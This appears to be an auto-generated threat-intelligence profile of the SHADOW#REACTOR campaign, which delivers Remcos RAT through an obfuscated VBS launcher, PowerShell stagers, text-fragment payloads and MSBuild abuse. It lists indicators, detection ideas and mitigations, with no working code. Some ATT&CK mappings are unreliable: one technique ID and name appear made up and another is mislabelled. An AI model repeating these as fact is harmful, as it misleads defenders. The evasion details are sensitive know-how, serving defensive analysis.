Full Report
Cybersecurity researchers have disclosed details of a new campaign dubbed SHADOW#REACTOR that employs an evasive multi-stage attack chain to deliver a commercially available remote administration tool called Remcos RAT and establish persistent, covert remote access. "The infection chain follows a tightly orchestrated execution path: an obfuscated VBS launcher executed via wscript.exe invokes a
Analysis Summary
# Tool/Technique: Remcos RAT
## Overview
Remcos RAT is a commercially available Remote Administration Tool leveraged in the SHADOW#REACTOR campaign to establish persistent, covert remote access on compromised systems.
## Technical Details
- Type: Malware (Remote Access Trojan)
- Platform: Windows
- Capabilities: Full remote control, configuration retrieval, backdoor functionality.
- First Seen: Not specified in context, but usage in this campaign is new.
## MITRE ATT&CK Mapping
*(Note: Mappings are derived from the known capabilities of Remcos RAT and the deployment method described.)*
- TA0003 - Persistence
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Implied by RAT establishing persistence)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (RAT communication)
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Used in initial stages to drop/invoke Remcos)
## Functionality
### Core Capabilities
- Establishing covert remote access via a backdoor.
- Deploying finalized payload on the compromised host.
### Advanced Features
- Configuration is fetched dynamically post-deployment from a remote host, allowing for flexible targeting or updates.
- The deployment chain is highly evasive, utilizing multi-stage execution, in-memory loading, and LOLBin abuse.
## Indicators of Compromise
- File Hashes: Not specified in context.
- File Names: Final payload execution relies on the deployment framework, but the framework drops:
- `win64.vbs` (Obfuscated VBS launcher)
- `qpwoe64.txt` or `qpwoe32.txt` (Text-based payload fragments)
- `jdywa.ps1` (Secondary PowerShell script)
- Registry Keys: Not specified in context.
- Network Indicators: Communication endpoints used to fetch VBS and text payloads (Defanged reference: remote host).
- Behavioral Indicators:
- Execution of VBS via `wscript.exe`.
- Use of PowerShell for downloading and payload reconstruction.
- Heavy reliance on in-memory execution (.NET Reactor–protected assembly).
- Abuse of `MSBuild.exe` for final execution (LOLBin abuse).
## Associated Threat Actors
- Not attributed to a known threat group; activity assessed as broad and opportunistic, aligning with Initial Access Brokers (IABs).
## Detection Methods
- Signature-based detection: Ineffective against this highly dynamic, in-memory loader structure, which relies on text intermediates.
- Behavioral detection: Monitoring for sequential execution: `wscript.exe` spawning PowerShell, subsequent file drops in `%TEMP%`, and execution initiated by `MSBuild.exe` loading .NET assemblies.
- YARA rules: Should target signatures within the reconstructed payloads or the .NET Reactor assembly, if extractable.
## Mitigation Strategies
- Prevention measures: Restricting execution of scripts (VBS/PowerShell) via application control policies where possible. Monitoring for suspicious script execution chains initiated by user interaction (e.g., opening a document leading to VBS execution).
- Hardening recommendations: Implementing EDR solutions capable of deep memory inspection and detecting LOLBin abuse, specifically focusing on `MSBuild.exe` being used to execute code rather than compile projects.
## Related Tools/Techniques
- **SHADOW#REACTOR Campaign:** The multi-stage deployment methodology utilizing text-only stagers and memory reconstruction.
- **.NET Reactor:** Used to protect and obfuscate the core reflective loader assembly, complicating static analysis.
- **PowerShell Downloader/Staging:** Use of **System.Net.WebClient** within PowerShell to download file fragments.
- **MSBuild.exe:** Used as a Living-Off-The-Land Binary (LOLBin) for final payload execution, linked to T1218 (Signed Binary Proxy Execution).
---
# Tool/Technique: SHADOW#REACTOR Infection Chain (Loader Framework)
## Overview
SHADOW#REACTOR refers to the specific, evasive, multi-stage infection chain used by the attackers to deploy the Remcos RAT. It utilizes modularity, text-only intermediates, and in-memory reconstruction to evade traditional detection methods.
## Technical Details
- Type: Attack Framework / Technique Chain
- Platform: Windows
- Capabilities: Evasion, multi-stage execution, ensuring payload integrity, persistence establishment.
- First Seen: Recent campaign disclosed by researchers (circa Jan 2026 context).
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell (PowerShell)
- T1204.002 - User Execution: Malicious File
- TA0003 - Persistence
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Implied by persistence setting)
- TA0005 - Defense Evasion
- T1055 - Process Injection (Implied by in-memory loading)
- T1164 - Domain Function: Execution Avoidance (Use of text intermediate files)
## Functionality
### Core Capabilities
- **Obfuscated VBS Launcher:** Initiates the chain using `wscript.exe`.
- **Text-Only Staging:** Downloads fragmented, text-based payloads (`qpwoe*.txt`) to complicate file-based scanning.
- **Self-Healing Download:** Looping mechanism in the PowerShell stager checks file existence/size to ensure complete payload retrieval before proceeding.
### Advanced Features
- **In-Memory Reconstruction:** Payloads are reassembled from text fragments and loaded directly into memory using a .NET Reactor–protected assembly.
- **Anti-Analysis Checks:** The secondary PowerShell script includes anti-debugging and anti-VM checks.
- **LOLBin Abuse:** Final execution leverages `MSBuild.exe` to launch the Remcos RAT, masking the malicious activity as legitimate system operations.
## Indicators of Compromise
- File Hashes: Not specified in context.
- File Names: `win64.vbs`, `qpwoe64.txt`, `jdywa.ps1`.
- Registry Keys: Not specified in context.
- Network Indicators: Communication to the same remote host for initial VBS file and subsequent text payloads.
- Behavioral Indicators:
- Execution of VBS scripts via `wscript.exe`.
- PowerShell script downloading content and saving it as a TXT file in `%TEMP%`.
- Execution flow moving from VBS $\rightarrow$ PowerShell $1 \rightarrow$ PowerShell $2$ (in memory) $\rightarrow$ `MSBuild.exe`.
- Loop mechanism for re-downloading missing/incomplete payload fragments.
## Associated Threat Actors
- Activity assessed to be broad and opportunistic, characteristic of Initial Access Brokers (IABs).
## Detection Methods
- Behavioral detection is key: Monitoring the specific sequence of process creation and file interaction within the `%TEMP%` directory, especially the invocation of Windows build tools (`MSBuild.exe`) without associated compilation activity.
- Content inspection for the known VBS and PowerShell stager artifacts, despite obfuscation.
## Mitigation Strategies
- **Application Control:** Restrict the execution path for `wscript.exe` and PowerShell, or specifically block the execution of obfuscated/encoded scripts.
- **Network Segmentation/Firewall:** Block outbound connections from non-standard processes (like script hosts) attempting to download textual data from untrusted sources.
- **System Hardening:** Prevent normal users from storing and executing arbitrary scripts/code in user directories like `%TEMP%`.
## Related Tools/Techniques
- Remcos RAT (Final Payload)
- Living-Off-The-Land Binaries (LOLBins) Abuse (Specifically MSBuild.exe)
- Reflective DLL Injection (In-memory loading of the .NET assembly)